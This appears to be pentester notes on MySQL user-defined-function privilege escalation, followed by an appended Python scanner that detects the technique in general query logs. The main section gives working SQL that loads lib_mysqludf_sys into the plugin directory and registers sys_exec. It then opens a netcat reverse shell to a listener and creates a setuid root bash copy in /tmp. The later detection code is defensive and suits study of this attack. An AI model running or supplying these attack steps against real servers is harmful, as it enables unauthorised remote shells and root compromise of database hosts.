MySQL User Defined Function

If we find root credentials for an internal MySQL server, it is game over.

Once we log in, we need to locate the plugin directory and check whether secure_file_priv is null so that we can load data into the database.

show variables like '%plugin%';

Take note of the plugin directory.

show variables like '%secure_file_priv%';

Make sure that this one is null; otherwise this shit is not vulnerable, because we won't be able to load data.

Now literally just follow this.

# Local method
use mysql;
create table tranilment(line blob);
insert into tranilment values(load_file('/tmp/lib_mysqludf_sys_64.so'));
select * from tranilment into dumpfile '/<plugin_dir>/lib_mysqludf_sys_64.so';
create function sys_exec returns integer soname 'lib_mysqludf_sys_64.so';
select sys_exec('nc <listener_ip> 1234 -e /bin/bash');

You should get a reverse shell. If for any reason a firewall is blocking outbound connections, that is not an issue.

Try this:

 select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');

Here are some articles to help you out:

Sometimes it'll give you an error because the dumpfile step fails.

To troubleshoot it, just copy the .so file into the plugin directory manually via the command line.
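
Seen from the detection side, the statement sequence above leaves a distinctive trail whenever the server's general query log (general_log) is enabled. The scanner below is an added example, not part of the original notes: the log lines, the plugin path in them, and the rule names are constructed for illustration.

```python
import re

# Constructed sample of general query log lines: timestamp, thread id, command, statement.
SAMPLE_LOG = """\
2024-05-01T10:00:01.000001Z\t   41 Query\tselect id, name from shop.products where id = 7
2024-05-01T10:02:11.000001Z\t   57 Query\tshow variables like '%plugin%'
2024-05-01T10:02:30.000001Z\t   57 Query\tinsert into tranilment values(load_file('/tmp/lib_mysqludf_sys_64.so'))
2024-05-01T10:02:41.000001Z\t   57 Query\tselect * from tranilment into dumpfile '/usr/lib/mysql/plugin/lib_mysqludf_sys_64.so'
2024-05-01T10:02:55.000001Z\t   57 Query\tcreate function sys_exec returns integer soname 'lib_mysqludf_sys_64.so'
2024-05-01T10:03:02.000001Z\t   57 Query\tselect sys_exec('id')
"""

LINE = re.compile(r"^(\S+)\s+(\d+)\s+Query\s+(.*)$")
# Stateless rules (names are hypothetical): server-side file read, library written via DUMPFILE.
RULES = [
    ("load_file_read", re.compile(r"\bload_file\s*\(", re.I)),
    ("dumpfile_library_write", re.compile(r"\binto\s+dumpfile\s+'[^']*\.(?:so|dll)'", re.I)),
]
CREATE_UDF = re.compile(
    r"\bcreate\s+(?:aggregate\s+)?function\s+(?:if\s+not\s+exists\s+)?`?(\w+)`?"
    r"\s+returns\s+\w+\s+soname\s+'([^']+)'", re.I)

def scan(log_text):
    """Return (thread_id, rule, statement) findings in log order."""
    findings, udfs = [], set()
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue  # not a Query entry
        thread, stmt = int(m.group(2)), m.group(3)
        for name, rx in RULES:
            if rx.search(stmt):
                findings.append((thread, name, stmt))
        # Stateful rule: calls to any function registered from a shared library earlier in the log.
        for udf in sorted(udfs):
            if re.search(r"\b%s\s*\(" % re.escape(udf), stmt, re.I):
                findings.append((thread, "udf_call:" + udf, stmt))
        created = CREATE_UDF.search(stmt)
        if created:
            udfs.add(created.group(1).lower())
            findings.append((thread, "udf_register:" + created.group(2), stmt))
    return findings

if __name__ == "__main__":
    for thread, rule, stmt in scan(SAMPLE_LOG):
        print(thread, rule, stmt, sep=" | ")
```

The stateful rule only knows functions registered inside the scanned window; names already present in the mysql.func table can be added to the set before scanning.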
